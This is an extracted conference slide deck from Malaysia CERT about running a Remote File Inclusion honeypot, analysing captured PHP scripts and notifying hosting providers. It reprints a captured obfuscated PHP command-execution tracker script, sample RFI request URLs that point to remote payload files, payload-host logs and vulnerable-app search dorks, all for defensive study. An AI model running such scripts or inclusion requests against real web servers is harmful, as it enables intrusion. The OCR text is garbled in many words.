Remote File Inclusion (RFI) Adacks in the Wild

Remote File Inclusion (RFI) A2acks in the Wild Adli Wahid VP Cyber Security Responsive Services Head of Malaysia CERT CyberSecurity Malaysia [email protected] TAIS 2011, Taipei, Taiwan The Story •  Stuff to Cover –  Remote File Inclusion –  CollecNng RFI a2acks –  PHP Sandbox –  Responding to RFI a2acks (the CERT way) –  Issues CyberSecurity Malaysia •  Agency under the Ministry Science, Technology and InnovaNon •  Houses the Malaysia CERT (Cyber999) and Digital Forensics •  Many other cyber security iniNaNves for Malaysia •  AcNvely engaging (potenNal) partners locally and globally •  For more informaNon www.cybersecurity.my Incident Handling / Cyber999 Malware Research Centre Co-­‐
ordinaNon Centre Remote File Inclusion Remote File Inclusion A2acks •  Nothing new –  If you’ve been following OWASP.org •  Revolves around bad PHP programming + bad security configuraNon •  Why Bad ? –  Allows a2acker to include remote file on your web server –  Not visible like a ‘web defacement’ –  Millions of Web ApplicaNons Remote File Inclusion A2acks (2) •  Can lead to 1. Code execuNon on the web server (sounds familiar?) 2. Code execuNon on the client-­‐side such as Javascript which can lead to other a2acks such as cross site scripNng (XSS). 3. Denial of Service (DoS) 4. Data Thea/ManipulaNon RFI from CERTs perspecNve •  Compromised computers –  Servers vulnerable and compromised via RFI –  Servers hosNng RFI scripts –  Computers scanning for RFI VulnerabiliNes –  If part of a botnet •  Command and Control idenNficaNon (and takedowns) •  Bots connected to the C&C (Any computers from MY) ? •  Need to do something about it! RFI Honeypot RFI Honeypot @ MyCERT •  One of the components of our Honeynet Project (a.k.a Lebahnet) •  Started in 2007 •  Higher Level Purpose –  To understand the nature of RFI a2acks in general –  To eliminate evilness on the Internet RFI Honeypot @ MyCERT •  Low InteracNon Web Honeypot –  lure the a2acker to a2ack –  convince the RFI scanner that it is really a vulnerable web applicaNon •  Based on HIHAT & Discussions with many people –  h2p://hihat.sourceforge.net/ –  Be2er opNon today : Glastopf h2p://glastopf.org/ Components 1. 
2. 
3. 
4. 
5. 
mod_rewrite(Apache) Google Dork Collector/Sensor ‘Imposer’ Database #1 mod_rewrite •  mod_rewrite – Apache module – Process different files from what is requested, without user/client aware about it. •  If client request –  http://www.rfihoneypot.my/txt-db-api/txt-db-api.php?
API_HOME_DIR=http://www.brvg s.k12.va.us/ images/
derf.txt?
•  Send to: http://www.rfihoneypot.my/collector.php
mod_rewrite •  Apache mod_rewrite configuraNon RewriteEngine On
RewriteRule ^/.+/.*$ /collector.php
•  Any request to $rootWebDir/<somedir>/
anyfile.php should be reroute to $rootWebDir/
controller.php #2 Google Dork •  Google Dork –  Scanner uses search engines to find vulnerable applicaNons –  Crawler index word and links from internet –  Inurl: special keyword used by google –  Populate huge list of links in a page •  Note –  they may not use Google  –  Google may detect that it is not human doing the search * <a href="/photoalb/lib/static/header.php?
set_menu=">allintitle:iPhotoAlbum</a><br/>!
<a href="/squito/photolist.inc.php?photoroot=">"Squitosoft All Rights
Reserved"</a>!
<a href="/coin_includes/constants.php">powered by phpCOIN 1.2.3</a><br/
>!
<a href="/includes/dbal.php">Powered By Aardvark Topsites PHP 4.2.2</
a><br/>!
#2 Google Dork (2) •  Tell google crawler to crawl our page via –  http://www.google.com/addurl/
#3 Collector/Sensor •  Collector/Sensor –  A php script to log every parameter sent by the a2acker –  PHP global variable $attackerIp=$_SERVER['REMOTE_ADDR'];!
$attackerBrowser=$_SERVER['HTTP_USER_AGENT'];!
$source=$_SERVER['REQUEST_URI'];!
–  Other PHP parameter: •  $_POST •  $_GET •  $_COOKIE #4 ‘ The Imposer’ •  Why do we need this? –  RFI a2empts are easily monitored in web sever logs –  A2acker may not want to share their real payload script –  Most a2acker test RFI vulnerability via scripts and expect a certain output •  Our “imposer” script tricks the a2acking (bot) that the applicaNon is has RFI vulnerability (‘exploitable’) #4 Imposer – Test Script –  Example Tracker Script <?php
/*******************************************\
.:f4st3rs Cr3w:.
|
\*******************************************/
$x15="\x64i\163\x6b\137fr\x65e_s\x70a\x63e"; $x16="\145\170\x65\143"; $x17="fe\x6f\146";
$x18="\x66\x72\145a\144"; $x19="\146\165\156\x63tio\x6e\137\145\x78\151\x73\164\x73"; $x1a="g
\145\x74\x63\167\144"; $x1b="i\163\x5fr\145\163o\x75\162c\145"; $x1c="i\x73\137\156ume\x72\151\143";
$x1d="\152o\151\156"; $x1e="\x6fb\137ge\164\x5fco\x6e\164e\x6e\x74s"; $x1f="ob_\145\x6e\144\137\143\x6c
\x65a\x6e"; $x20="\157\x62_\163t\x61r\164"; $x21="\x70\x61\x73s\164\150ru"; $x22="\160\143\x6c\x6f
\x73\x65"; $x23="\160\150p\x5f\x75\x6e\141\x6d\x65"; $x24="\160o\x70\x65\x6e"; $x25="r\x6fu\x6e\x64";
$x26="\x73\150e\154\x6c\x5f\x65x\x65\x63"; $x27="\163\171\x73te\x6d";
$x0b = @$x1a();echo "R\157\170\x54e\x61m<\142r\x3e";$x0c = @$x23();echo "u\156\x61m\x65\x20\x2da
\072\040$x0c<\142\162>";$x0d = @PHP_OS;echo "\x4fS\124\x59P\x45:$x0d\x3c\x62\162\x3e";$x0e = $x15
($x0b); if ($x0e === FALSE) {$x0e = 0;} if ($x0e < 0) {$x0e = 0;} echo "Free\x3a".view_size($x0e)."\x3cbr\x3e";
$x0f="\x69\144";$x10=ex($x0f);echo $x10;function ex($x11){ global $x15,$x16,$x17,$x18,$x19,$x1a,$x1b,$x1c,
$x1d,$x1e,$x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27; $x12 = '';if (!empty($x11)){if($x19('exec')){@$x16
($x11,$x12);$x12 = $x1d("\n",$x12);}elseif($x19('shell_exec')){$x12 = @$x26($x11);}elseif($x19('system')){@
$x20();@$x27($x11);$x12 = @$x1e();@$x1f();}elseif($x19('passthru')){@$x20();@$x21($x11);$x12 = @$x1e
();@$x1f();}elseif(@$x1b($x13 = @$x24($x11,"r"))){$x12 = "";while(!@$x17($x13)) { $x12 .= @$x18
($x13,1024); }@$x22($x13);}}return $x12;}function view_size($x14) { global $x15,$x16,$x17,$x18,$x19,$x1a,
$x1b,$x1c,$x1d,$x1e,$x1f,$x20,$x21,$x22,$x23,$x24,$x25,$x26,$x27; if (!$x1c($x14)) {return FALSE;}else{ if
($x14 >= 1073741824) {$x14 = $x25($x14/1073741824*100)/100 ."\040\x47\x42";} elseif ($x14 >= 1048576)
{$x14 = $x25($x14/1048576*100)/100 ." M\102";} elseif ($x14 >= 1024) {$x14 = $x25($x14/1024*100)/100 ."
\x4b\102";} else {$x14 = $x14 . " \x42";} return $x14;} } exit;
#4 -­‐ Imposer •  Results expected by Scanner RoxTeam
uname -a: Linux sarah13 2.6.24-21-server #1 SMP Wed Feb 26
00:18:13 UTC 2009 i686
OSTYPE:Linux
•  Scanner uses regular expression to check the expected keyword : 'RoxTeam' #4 Imposer •  Honeypot downloads the RFI script •  Simple Hooking Technique used to ensure that script does not execute commands such as wget, exec and etc •  Size of RFI script file may be used to determine either its test script or real payload –  The real challenge is to make sure the imposer not execute the malicious code, just the tracker script #5 Database •  5) MySQL Database –  Similar table structure like HIHAT CREATE TABLE IF NOT EXISTS `main_logs` (!
`ID` int(11) NOT NULL auto_increment,!
`attackerIP` varchar(15) NOT NULL,!
`attackerBrowser` varchar(600) NOT NULL,!
`Source` varchar(600) NOT NULL,!
`Value_Server` longtext NOT NULL,!
`Value_Get` longtext NOT NULL,!
`Value_Post` longtext NOT NULL,!
`Value_Cookie` longtext NOT NULL,!
`Creation` timestamp NOT NULL default
CURRENT_TIMESTAMP,!
`Module` varchar(600) NOT NULL,!
`download_checked` smallint(6) NOT NULL,!
`rfi_key` int(11) default '0',!
PRIMARY KEY (`ID`),!
KEY `Module` (`Module`),!
KEY `Creation` (`Creation`),!
KEY `rfi_id` (`rfi_key`)‫!‏‬
)‫‏‬
#5 Database •  Store all unique RFI code in different table •  Use md5 CREATE TABLE IF NOT EXISTS `rfi_code` (!
`id_files` int(11) unsigned NOT NULL,!
`bin_data` longblob NOT NULL,!
`source_url` tinytext NOT NULL,!
`filename` varchar(256) NOT NULL,!
`filesize` int(11) NOT NULL,!
`filetype` varchar(50) NOT NULL,!
`filemd5` varchar(50) default NULL,!
`Creation` timestamp NOT NULL default CURRENT_TIMESTAMP,!
KEY `filemd5` (`filemd5`)‫!‏‬
) ENGINE=MyISAM DEFAULT CHARSET=latin1 COMMENT='automatically
downloaded,malicious tools';\!
RFI A2ack Recap (Honeypot PerspecNve) 1 2 RFI Scanner Link Page 4 3 Collector Imposer 5 RFI Honeypot ObservaNons •  August 2009 – March 7th 2011 –  A2empts : 3,199,683 –  Unique IP addresses : 21,819 –  Unique RFI scripts : 44,376 –  Unique domains: 10,909 More observaNons •  MoNve –  Bot recruitment –  ‘TradiNonal’ IRC based C&C •  Scripts hosted mostly on: –  Free hosNng services –  Compromised servers •  Who? –  Based on language used for variables in PHP scripts ObservaNons -­‐ Pa2ern Source/
Host
Host
2 2 1 Honeypot
IRC dump 2010:09:14:07:13:10 < haRFIz> 2010-09-14 07:19:27 MYT 184.107.48.144
a05dfd7cca7771a7565a154d65f05ea2 http://foreve.lv/inx/fx29id1.txt???? !
2010:09:14:07:13:11 < haRFIz> 2010-09-14 07:19:30 MYT 184.107.48.144
8dcad47f3e32e7dc1aee59167e67c601 http://foreve.lv/inx/fx29id2.txt????? !
2010:09:14:07:13:12 < haRFIz> 2010-09-14 07:19:33 MYT 184.107.48.144
ae3d1b64a7144a7a0b424a6be713f8da http://foreve.lv/inx/kucing.txt?!
2010:09:14:07:13:12 < haRFIz> 2010-09-14 07:19:38 MYT 184.107.48.144
ae3d1b64a7144a7a0b424a6be713f8da http://foreve.lv/inx/kucing.txt?!
2010:09:14:07:13:30 < haRFIz> 2010-09-14 07:19:42 MYT 184.107.48.144
ae3d1b64a7144a7a0b424a6be713f8da http://foreve.lv/inx/kucing.txt?!
2010:09:14:07:13:31 < haRFIz> 2010-09-14 07:19:46 MYT 184.107.48.144
ae3d1b64a7144a7a0b424a6be713f8da http://foreve.lv/inx/kucing.txt? !
RFI Script Hosting
32 Copyright © 2010 CyberSecurity Malaysia Nice StaNsNcs So What? Incident Response & Handling •  Rule #1 –  Thou shall not sit on data (and try to scare people at security conferences) •  Rule #2 –  Thou shall not sell or charge people for data collected from these pots (barter trade maybe?) What do we have? Generic a2acks 1.  Source of
attack (via
logs)
Malware 1.  Source of
Attack
2.  Host hosting
the payload /
dropper
3.  Malware
Samples
RFI 1.  Source of
attack
2.  Host hosting
the RFI script
3.  RFI scripts
Sample RFIpot log 2009-03-25 11:26:29 MYT 201.88.6.202 http://thalesnn.justfree.com/rox/cmd.txt?
2009-03-25 11:26:29 MYT 201.88.6.202 http://thalesnn.justfree.com/rox/cmd.txt?
Source of Attack
RFI Script hosted here
We detected the following malicous code used for RFI acNvity on this resource: Domain Name = www.some_free_web_hosNng_domain.com Ip a.b.c.e ASN = XYZ Country = US File(s) below exist as per our checking on Sat May 16 10:41:57 +0800 2009 1 -­‐ h2p://www.some_free_web_hosNng_domain.com/clim_nonblok/Mistery.txt 2 -­‐ h2p://www.some_free_web_hosNng_domain.com/daffa_remex/jembod.txt 3 -­‐ h2p://www.some_free_web_hosNng_domain.com/daffa_remex/php.txt 4 -­‐ h2p://www.some_free_web_hosNng_domain.com/dedet_hot/phpcohul.txt 5 -­‐ h2p://www.some_free_web_hosNng_domain.com/deniseroderick/Send_To.txt 6 -­‐ h2p://www.some_free_web_hosNng_domain.com/dinonatadijaya/c.txt 7 -­‐ h2p://www.some_free_web_hosNng_domain.com/dinonatadijaya/dd.txt 8 -­‐ h2p://www.some_free_web_hosNng_domain.com/dinoshiefa/ds1.txt 9 -­‐ h2p://www.some_free_web_hosNng_domain.com/dj.bend/bot.txt 10 -­‐ h2p://www.some_free_web_hosNng_domain.com/ginn45/angga.txt 11 -­‐ h2p://www.some_free_web_hosNng_domain.com/ginn45/budi3.txt 12 -­‐ h2p://www.some_free_web_hosNng_domain.com/ginn45/diam.txt 13 -­‐ h2p://www.some_free_web_hosNng_domain.com/ginn45/pingin.txt 14 -­‐ h2p://www.some_free_web_hosNng_domain.com/gp_davied/jembod/g.txt 15 -­‐ h2p://www.some_free_web_hosNng_domain.com/gp_davied/jembod/load.txt 16 -­‐ h2p://www.some_free_web_hosNng_domain.com/Hudhaa86//alnet.txt 17 -­‐ h2p://www.some_free_web_hosNng_domain.com/partner_komputer/inject.txt 18 -­‐ h2p://www.some_free_web_hosNng_domain.com/sandy_zazmit/fx29id2.txt The Numbers •  2010 -­‐ 2011 –  8861 noNficaNons sent to various parNes related to RFI scripts hosted and a2acks –  Normally CCed to NaNonal CERTs Good Responses Hello, I'm forwarding your email to the proper contacts for this network so they can invesNgate this incident. Thank you for reporNng this incident, Thank you for your report! The files are deleted and now we are looking how they could come to our customers page. thanks ans regards Dear MYCERT Administrators, Hello, Thank you for informing us. The site tampok.webng.com has been removed from our network. Best Regards, Thank you for your feedback. Please be informed that Pacnet Abuse has idenNfied the source involved in the unusual acNvity originaNng from 202.42.231.202 you have reported on 21 June 2009. Further acNon has been taken to inhibit such acNvity. The relevant administrator of the said IP address has been informed, warned and advised to fix the problem at the soonest Nme possible. More Good Responses Hy i'va delete the directory "le2er" , but this a2ack regulary my space, then he come back when ! delete files, and i don't now how to block it, i'va put in a .htacces this 2 lines : RewriteCond %{QUERY_STRING} ^(.*&)?error=h2p:// RewriteRule ^(.*/)?errors.php -­‐ [F,L] but I'm not shure that ok for this. To MyCERT, I have shutdown this server, as it is against our terms and condiNons. Thanks for this report. Cheers, Damien Ugly pKaji The Suspicious PHP Script Sandbox Copyright © 2010 CyberSecurity Malaysia 42 pKaji
•  ‘Suspicious’ PHP code analyzer
•  Built to simplify the analysis process of
obfuscated PHP files
•  Facilitates quick detection of network
activities and all kinds of malicious code
by using the hooking technique
43 Copyright © 2011 CyberSecurity Malaysia pKaji
•  pKaji uses APD (Advance PHP Debugger)
extension to hook the original PHP built-in
function
44 Copyright © 2010 CyberSecurity Malaysia pKaji
•  Advanced PHP Debugger functions:
– 
– 
– 
– 
– 
– 
– 
– 
– 
– 
– 
– 
– 
– 
– 
– 
47 apd_breakpoint — Stops the interpreter and waits on a CR from the socket
apd_callstack — Returns the current call stack as an array
apd_clunk — Throw a warning and a callstack
apd_continue — Restarts the interpreter
apd_croak — Throw an error, a callstack and then exit
apd_dump_function_table — Outputs the current function table
apd_dump_persistent_resources — Return all persistent resources as an array
apd_dump_regular_resources — Return all current regular resources as an array
apd_echo — Echo to the debugging socket
apd_get_active_symbols — Get an array of the current variables names in the local
scope
apd_set_pprof_trace — Starts the session debugging
apd_set_session_trace_socket — Starts the remote session debugging
apd_set_session_trace — Starts the session debugging
apd_set_session — Changes or sets the current debugging level
override_function — Overrides built-in functions
rename_function — Renames orig_name to new_name in the global function table
Copyright © 2010 CyberSecurity Malaysia pKaji
48 Copyright © 2010 CyberSecurity Malaysia pKaji
49 Copyright © 2010 CyberSecurity Malaysia pKaji Screenshot
50 Copyright © 2010 CyberSecurity Malaysia Issues and Conclusion Issues •  Take-­‐downs are just one aspect of the bigger picture •  Data reliability –  Using TOR nodes to conduct a2acks •  Assessing the damage that RFI has done to a server –  Visibility –  Cleaning up –  Rebuild Server ? •  Who is going to teach about web applicaNon security best pracNces or security in general? Conclusion •  RFI is out there, sNll prevalent •  Need to do something about security •  InformaNon sharing is key Thank You for Listening! •  Contact –  Email : [email protected] –  Web: •  www.mycert.org.my •  www.cybersecurity.my